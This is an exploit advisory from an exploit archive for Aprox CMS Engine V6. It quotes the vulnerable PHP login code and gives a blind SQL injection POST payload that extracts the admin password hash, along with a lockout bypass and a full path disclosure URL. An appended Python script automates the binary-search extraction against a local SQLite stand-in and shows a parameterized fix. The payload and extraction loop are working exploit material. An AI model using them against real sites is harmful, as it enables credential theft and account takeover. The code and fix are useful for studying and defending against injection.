[webapps / 0day] - Aprox CMS Engine V6 Multiple Vulnerabilities
Posted on 03 October 2010
============================================
Aprox CMS Engine V6 Multiple Vulnerabilities
============================================

# Exploit Title: Aprox CMS Engine V6 Multiple Vulnerabilities
# Date: 03.10.2010
# Author: Stephan Sattler // http://www.solidmedia.de
# Software Website: http://www.aprox.de/
# Software Link: http://www.aprox.de/index.php?page=d&application=zip&dateiname=AproxEngine_v6
# Version: 6

[Vulnerability 1] Blind SQL injection in the login handler

# Vulnerable Code: sql_login.inc, lines 63-91

    if (isset($_GET["action"]) && ($_GET["action"] != "")) {
        $action = $_GET["action"];
    }
    unset($password);
    // the submitted password is hashed and never reaches the query
    if (isset($_POST["password"]) && ($_POST["password"] != "")) {
        $password = md5($_POST["password"]);
    }
    unset($login);
    // the login name is taken verbatim from the request
    if (isset($_POST["login"]) && ($_POST["login"] != "")) {
        $login = $_POST["login"];
    }
    if (($login == "") or ($password == "")) {
        echo "Angegeben nicht vollständig!";   // "Input incomplete!"
        die;
    }
    $db = mysql_connect(serverhost, user, pass, database);
    // $login is interpolated straight into the SQL string: this is the injection point
    $abfrage = "select * from " . suffix . "users where login = '$login'";
    $res = mysql_db_query(database, "$abfrage");
    $num = mysql_num_rows($res);
    #echo $num;
    if ($num > 0) {
        #echo "user gefunden,<br>";            // "user found"
        $pass = mysql_result($res, 0, 'password');
        // the password is checked in PHP only after the injectable query has run
        if ($password == $pass) {
            echo "Alles OK!!!";                // "All OK!!!"
            $name = mysql_result($res, 0, 'real_name');
            $_SESSION["name"] = $name;
            $_SESSION["login"] = $login;
            $_SESSION["pass"] = $pass;
            $login_gepruefter_user = mysql_result($res, 0, 'gepr_mitglied');
            $_SESSION["gepruefter_user"] = $login_gepruefter_user;
            // ... the excerpt ends at line 91; the rest of the success path is not shown
        }
    }

# Explanation:

$_POST["login"] is neither validated nor escaped before it is interpolated into the SELECT statement, so an attacker controls the rest of the WHERE clause. The query result is never displayed, but whether the login succeeds depends on whether a row came back, and that yes/no answer is enough for a blind SQL injection attack.

# Exploiting the Vulnerability // PoC:

URL: http://[site]/[path]/index.php?page=sql_login

POST data (example for the admin user that is created after install; the table name assumes the default prefix aprox_, and the login value has to be URL-encoded when it is actually sent):

    login=admin' and ascii(substring((SELECT concat(password) from aprox_users limit 0,1),1,1))>'100&password=passwort&Submit=Login

The application appends the closing quote itself, so the executed query ends in

    ... where login = 'admin' and ascii(substring((SELECT concat(password) from aprox_users limit 0,1),1,1))>'100'

If the login succeeds, the first character of the stored hash is greater than 'd' (ASCII 100). Repeating the request with other thresholds and other substring positions recovers the hash one character at a time. An attacker who owns any account on the site can run the same test with their own login name and password: the row, and with it the "Alles OK!!!" response, only comes back when the injected condition is true. Without an account, the condition can be turned into a timing oracle with benchmark(). Aprox keeps its failed-login counter in the PHP session only, so the counter is reset by not sending the session cookie back, and the lockout does not prevent this attack.

[Vulnerability 2] Full path disclosure

For example:

    http://[site]/[path]/index.php?id=1 AnD 1=1

provokes a PHP error, and the error message reveals the full filesystem path of the installation.

# Inj3ct0r.com (http://inj3ct0r.com/) [2010-10-03]
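The extraction loop that the PoC above describes, as an added example that is not part of the advisory and not Aprox's own code. It runs against a constructed SQLite stand-in for the sql_login.inc logic (an in-memory aprox_users table with an admin row and a low-privilege account "mallory"/"passwort" that the attacker is assumed to own; neither account is an Aprox default). The stand-in keeps the two properties that make the injection work: the login name is interpolated into the SQL string, and the md5 comparison happens in application code after the row has been fetched. Two details differ from MySQL and are marked in the code: SQLite's unicode()/substr() replace ascii()/substring(), and the threshold is compared as an integer with a trailing "and '1'='1" to absorb the application's closing quote, because SQLite does not coerce the advisory's ">'100" the way MySQL does. The time-based benchmark() variant is MySQL-only and is not simulated. A parameterized version of the same check is included so the same payload can be shown failing against it.

```python
# Added example (not from the advisory or from Aprox): boolean-based blind
# extraction of the admin password hash through the login oracle, run against a
# constructed SQLite stand-in for the sql_login.inc logic.
import hashlib
import sqlite3

# Constructed sample data: the admin row and a low-privilege account the
# attacker owns ("mallory"/"passwort" is an assumption, not an Aprox default).
ADMIN_HASH = hashlib.md5(b"s3cret-admin-pw").hexdigest()
ATTACKER_LOGIN = "mallory"
ATTACKER_PW = "passwort"


def make_db():
    """In-memory stand-in for the aprox_users table (default prefix assumed)."""
    db = sqlite3.connect(":memory:")
    db.execute("create table aprox_users (login text, password text, real_name text)")
    db.executemany("insert into aprox_users values (?, ?, ?)", [
        ("admin", ADMIN_HASH, "Administrator"),
        (ATTACKER_LOGIN, hashlib.md5(ATTACKER_PW.encode()).hexdigest(), "Mallory"),
    ])
    return db


def vulnerable_login(db, login, password):
    """Mirrors sql_login.inc: login is interpolated into the SQL string, the
    md5 of the password is compared in application code after the query ran."""
    if login == "" or password == "":
        return False
    query = f"select * from aprox_users where login = '{login}'"
    row = db.execute(query).fetchone()
    return row is not None and hashlib.md5(password.encode()).hexdigest() == row[1]


def safe_login(db, login, password):
    """Same check with a bound parameter; the login value never reaches the SQL parser."""
    if login == "" or password == "":
        return False
    row = db.execute("select * from aprox_users where login = ?", (login,)).fetchone()
    return row is not None and hashlib.md5(password.encode()).hexdigest() == row[1]


def oracle(db, login_fn, position, threshold):
    """Ask the target one yes/no question: is character `position` (1-based)
    of admin's hash greater than `threshold`?

    The attacker authenticates with their own valid credentials, so the row
    (and with it the "login succeeded" response) only comes back when the
    injected condition is true. SQLite's unicode()/substr() stand in for
    MySQL's ascii()/substring(); the trailing "and '1'='1" absorbs the quote
    the application appends, where the advisory's PoC uses ">'100" instead.
    """
    payload = (
        f"{ATTACKER_LOGIN}' and unicode(substr((select password from aprox_users "
        f"where login = 'admin' limit 1), {position}, 1)) > {threshold} and '1'='1"
    )
    return login_fn(db, payload, ATTACKER_PW)


def extract_hash(db, login_fn, length=32):
    """Recover the 32-character md5 hex digest with a binary search per
    character: 7 login attempts per character instead of up to 127."""
    recovered = []
    for pos in range(1, length + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(db, login_fn, pos, mid):  # char > mid
                lo = mid + 1
            else:                               # char <= mid
                hi = mid
        recovered.append(chr(lo))
    return "".join(recovered)


if __name__ == "__main__":
    db = make_db()
    print("vulnerable login leaks the hash:", extract_hash(db, vulnerable_login) == ADMIN_HASH)
    print("parameterized login leaks the hash:", extract_hash(db, safe_login) == ADMIN_HASH)
```

Against vulnerable_login the 32 hex digits come back in 224 requests; against safe_login every oracle call returns False, because the whole payload is matched as a literal login name and no row exists for it. The fix for the real code is the same idea in PHP: pass $login as a bound parameter through mysqli or PDO prepared statements instead of building $abfrage by string concatenation.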